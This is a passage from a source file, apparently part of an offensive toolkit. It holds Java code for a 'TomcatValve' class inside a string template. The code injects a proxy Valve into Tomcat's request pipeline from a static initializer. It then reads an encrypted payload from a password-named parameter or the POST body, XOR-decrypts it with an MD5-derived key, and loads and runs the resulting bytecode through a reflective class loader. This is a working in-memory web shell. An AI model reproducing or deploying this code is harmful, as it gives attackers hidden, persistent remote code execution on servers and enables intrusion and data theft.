java.security.MessageDigest.getInstance(alg); 788 | h.update(str.getBytes(), 0, str.length()); 789 | return new java.math.BigInteger(1, h.digest()).toString(16); 790 | } catch (Exception e) { 791 | return null; 792 | } 793 | } 794 | 795 | private byte[] decoder(String payload) { 796 | return cipher( 797 | b64decode(payload), "XOR", 798 | hasher(password, "MD5").substring(0, 16).getBytes(), false 799 | ); 800 | } 801 | 802 | 803 | private String stub(String payload, Object request, Object response) 804 | throws Exception { 805 | if (invokeMethod(request, "getMethod").equals("POST")) { 806 | payload = (String) invokeMethod( 807 | invokeMethod(request, "getReader"),"readLine" 808 | ); 809 | java.util.HashMap pageContext = new java.util.HashMap(); 810 | Object session = invokeMethod(request, "getSession"); 811 | pageContext.put("request", request); 812 | pageContext.put("response", response); 813 | pageContext.put("session", session); 814 | invokeMethod(session, "putValue", 815 | 'u', hasher(password, "MD5").substring(0, 16)); 816 | byte[] b = decoder(payload); 817 | Constructor constructor = java.security.SecureClassLoader.class 818 | .getDeclaredConstructor(ClassLoader.class); 819 | constructor.setAccessible(true); 820 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 821 | new Object[]{this.getClass().getClassLoader()} 822 | ); 823 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 824 | "defineClass", byte[].class, int.class, int.class 825 | ); 826 | defineMethod.setAccessible(true); 827 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 828 | .newInstance().equals(pageContext); 829 | } 830 | return null; 831 | } 832 | 833 | private void hook(Object request, Object response) throws Exception { 834 | String payload = (String) invokeMethod( 835 | request, "getParameter", password 836 | ); 837 | stub(payload, request, response); 838 | } 839 | 840 | @Override 841 | public Object invoke(Object proxy, Method method, Object[] args) 842 
| throws Throwable { 843 | String methodName = method.getName(); 844 | if (methodName.equals("invoke")) { 845 | Object request = args[0]; 846 | Object response = args[1]; 847 | hook(request, response); 848 | Method invoke = getMethodX(nextvalve.getClass(), "invoke", 2); 849 | invoke.setAccessible(true); 850 | invoke.invoke(nextvalve, request, response); 851 | } else if (methodName.equals("setNext")) { 852 | nextvalve = args[0]; 853 | } else if (methodName.equals("getNext")) { 854 | return nextvalve; 855 | } else if (methodName.equals("toString")) { 856 | return this.getClass().getName(); 857 | } else if (methodName.equals("isAsyncSupported")) { 858 | return false; 859 | } 860 | return null; 861 | } 862 | 863 | private void addValve(Object proxyObject) throws Exception { 864 | Object context = getStandardContext(); 865 | Object pipeline = invokeMethod(context, "getPipeline"); 866 | getMethodX(pipeline.getClass(), "addValve", 1) 867 | .invoke(pipeline, proxyObject); 868 | } 869 | 870 | public TomcatValve() { 871 | synchronized(lock) { 872 | Class valveClass = null; 873 | try { 874 | valveClass = Class.forName( 875 | "org.apache.catalina.Valve" 876 | ); 877 | } catch (ClassNotFoundException e) {} 878 | 879 | if (valveClass != null) { 880 | Object proxyObject = Proxy.newProxyInstance( 881 | getLoader(), 882 | new Class[]{valveClass}, 883 | this 884 | ); 885 | try { 886 | addValve(proxyObject); 887 | } catch (Exception e) {} 888 | } 889 | } 890 | } 891 | 892 | static { 893 | new TomcatValve(); 894 | } 895 | } 896 | ` 897 | } 898 | --------------------------------------------------------------------------------